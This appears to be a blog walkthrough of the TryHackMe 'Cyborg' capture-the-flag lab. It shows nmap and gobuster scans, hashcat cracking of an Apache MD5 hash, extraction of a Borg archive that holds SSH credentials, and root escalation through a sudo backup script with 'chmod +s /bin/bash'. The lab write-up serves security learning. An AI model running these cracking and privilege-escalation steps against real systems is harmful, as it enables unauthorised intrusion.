Cyborg | Walkthrough | Tryhackme

Cyborg | Walkthrough | Tryhackme

/////JOINED Cyborg CTF/////////

 

———————–SCANNING Cyborg —————————-

JUST STARTED AN NMAP SCAN –

Result –:

nmap -sC -sV 10.10.76.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:48 IST
Nmap scan report for 10.10.76.128
The host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

///————///

NMAP SCAN IS JUST COMPLETED AND WE FIND THE 2 OPEN PORTS
1.SSH
2.HTTP

STARTED A GO BUSTER DIRECTORY SCAN –

Result –:

go buster dir -u http://10.10.76.128 -w /usr/share/wordlists/dirb/common.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/27 15:49:00 Starting go buster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /admin (Status: 301) [Size: 312] [–> http://10.10.76.128/admin/] /etc (Status: 301) [Size: 310] [–> http://10.10.76.128/etc/] /index.html (Status: 200) [Size: 11321] /server-status (Status: 403) [Size: 277]

===============================================================
2021/07/27 15:51:32 Finished Cyborg scan of Tryhackme.
===============================================================

////———-////

Gobuster scan is just completed and we found a useful directory — ADMIN

IN ADMIN WE FOUND SOME TAR FILES AND A ADMINS CHAT AND SOME PASSWORDS WHICH ARE IN HASH–

——————————CRACKING THE HASHES—————————–

WE HAVE TO FIRST CHECK THAT WHICH HASH IS THAT THAT’S WHY I AM USING THE HASH-IDENTIFIER TOOL IN THE KALI LINUX PRE-INSTALLED!!

HASH# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

The result –: Possible Hashes:
[+] MD5(APR)

THE HASH IS MD5 IT’S TIME TO CRACK THIS HASH WITH HASHCAT —

hashcat –force -m 1600 -a 0 has /usr/share/wordlists/rockyou.txt

Result –: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.: squidward

AS YOU CAN SEE PASSWD IS SQUIDWARD !! THIS PASSWORD IS POSSIBLY FOR THE BORG WHICH IS USED FOR ENCRYPT AND FOR COMPRESSING!!

//////////————-//////////

LET’S START DOING THAT !!

borg extract /path/to/archive::music_archive

The result–: Wow I’m awful at remembering Passwords so I’ve taken my Friend’s advice and noting them down!

Alex:[email protected]

SO WE HAVE THE CREDENTIALS OF THE SSH LOG IN!! Tryhackme.

/———————————–GAINING THE SHELL INTO THE MACHINE———————————————————\

AS WE HAVE THE PASSWORD AND THE USER OF THE ALEX USER WE EASILY GOT THE USER.TXT
CAT USER.TXT >>> — flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

NOW IT’S TIME TO ESCALATE THE PRIVILEGES OF THE ROOT!!!

        ————————–PRIVILEGE ESCALATION Cyborg ————————-

SO BY TYPING THE SUDO -L —

Matching Defaults entries for alex on ubuntu: Cyborg Tryhackme.
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

SO WE CAN THE /ETC/MP3BACKUPS/BACKUP.SH WITH ROOT SO WE HAVE TO JUST MODIFY THAT AND THEN WE CAN HAVE THE ROOT SHELL!!!

SO NOW LET’S START BY TYPING THIS COMMAND —

sudo /etc/mp3backups/backup.sh -c whoami

Result –: root   Tryhackme.

BY TYPING THIS, WE CAN HAVE THE ROOT ACCESS SO LET’S DO IT WITH BIN/BASH !!

sudo /etc/mp3backups/backup.sh -c “chmod +s /bin/bash”

BASH -P

whoami
root
bash-4.3# cat /root/root.txt = flag[——–flag——]

SO IT’S OVER !!!!!!

/////////////////COMPLETED THE CYBORG /////////////////////

 

 

 

Leave a Reply

Your email address will not be published.